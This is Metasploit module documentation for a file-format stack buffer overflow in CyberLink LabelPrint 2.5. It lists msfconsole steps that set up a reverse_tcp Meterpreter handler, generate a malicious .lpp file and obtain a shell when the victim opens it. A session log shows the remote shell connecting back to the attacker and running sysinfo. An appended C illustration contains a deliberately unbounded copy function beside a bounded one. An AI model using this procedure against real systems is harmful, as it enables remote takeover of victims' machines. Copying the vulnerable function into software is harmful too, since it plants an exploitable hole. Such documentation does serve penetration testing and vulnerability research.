metasploit-gs/documentation/modules/exploit/windows/fileformat/cyberlink_lpp_bof.md
2018-12-11 07:55:52 -06:00
## Description
This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
The vulnerability is triggered when a .lpp project file containing an overly long string is opened
via the application's Open File menu. The overflow overwrites a structured exception handler (SEH) record,
which allows control of the application to be taken. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
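As an added illustration of the bug class described above (hypothetical code, not CyberLink's and not part of the original module documentation): a project-file parser that copies a string field of file-supplied length into a fixed stack buffer, shown in its vulnerable form beside a bounded version that rejects overlong fields. The field name, buffer size and sample inputs are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 64   /* assumed size of the parser's stack buffer */

/* Vulnerable pattern: field_len comes from the file and is never checked
 * against the destination, so an overlong field overruns the stack frame.
 * In a 32-bit process the SEH registration records also live on the stack,
 * which is why a large overflow can overwrite one. main() does not call it. */
int parse_label_field_vulnerable(const char *field, size_t field_len)
{
    char name[FIELD_MAX];
    memcpy(name, field, field_len);   /* no bounds check */
    name[field_len] = '\0';
    return (int)strlen(name);
}

/* Hardened pattern: check the length before copying and always
 * NUL-terminate. Returns the copied length, or -1 to reject the field. */
int parse_label_field_safe(const char *field, size_t field_len,
                           char *out, size_t out_size)
{
    if (field == NULL || out == NULL || out_size == 0)
        return -1;
    if (field_len >= out_size)        /* no room for the terminator */
        return -1;
    memcpy(out, field, field_len);
    out[field_len] = '\0';
    return (int)field_len;
}

/* Constructed inputs: a normal label, then a 200-byte run of 'A's standing
 * in for the overly long string the module description refers to. */
int demo_normal_label(void)
{
    char out[FIELD_MAX];
    return parse_label_field_safe("Disc Label", 10, out, sizeof out);
}
int demo_overlong_label(void)
{
    char big[200], out[FIELD_MAX];
    memset(big, 'A', sizeof big);
    return parse_label_field_safe(big, sizeof big, out, sizeof out);
}

int main(void)
{
    printf("normal: %d, overlong: %d\n", demo_normal_label(), demo_overlong_label());
    return 0;
}
```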
## Vulnerable Application
CyberLink LabelPrint v2.5, which is available with [Power2Go 12 Essential](https://www.cyberlink.com/downloads/trials/power2go-platinum/download_en_US.html)
## Verification Steps
1. `./msfconsole`
2. `use exploit/multi/handler`
3. `set payload windows/meterpreter/reverse_tcp`
4. `set lhost <lhost>`
5. `set exitonsession false`
6. `exploit -j`
7. `use windows/fileformat/cyberlink_lpp_bof`
8. `set lhost <lhost>`
9. `set target 2`
10. `exploit`
11. Copy the generated file to the Windows 10 host and open it in the vulnerable software
12. Get a shell
## Scenarios
### Tested on Windows 10 x64 running CyberLink LabelPrint v2.5
```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.22.222.132
lhost => 172.22.222.132
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 172.22.222.132:4444
use windows/fileformat/cyberlink_lpp_bof
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132
lhost => 172.22.222.132
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2
target => 2
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > exploit
[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) >
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-IPOGIJR
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 172.22.222.200 - Meterpreter session 1 closed. Reason: User exit
```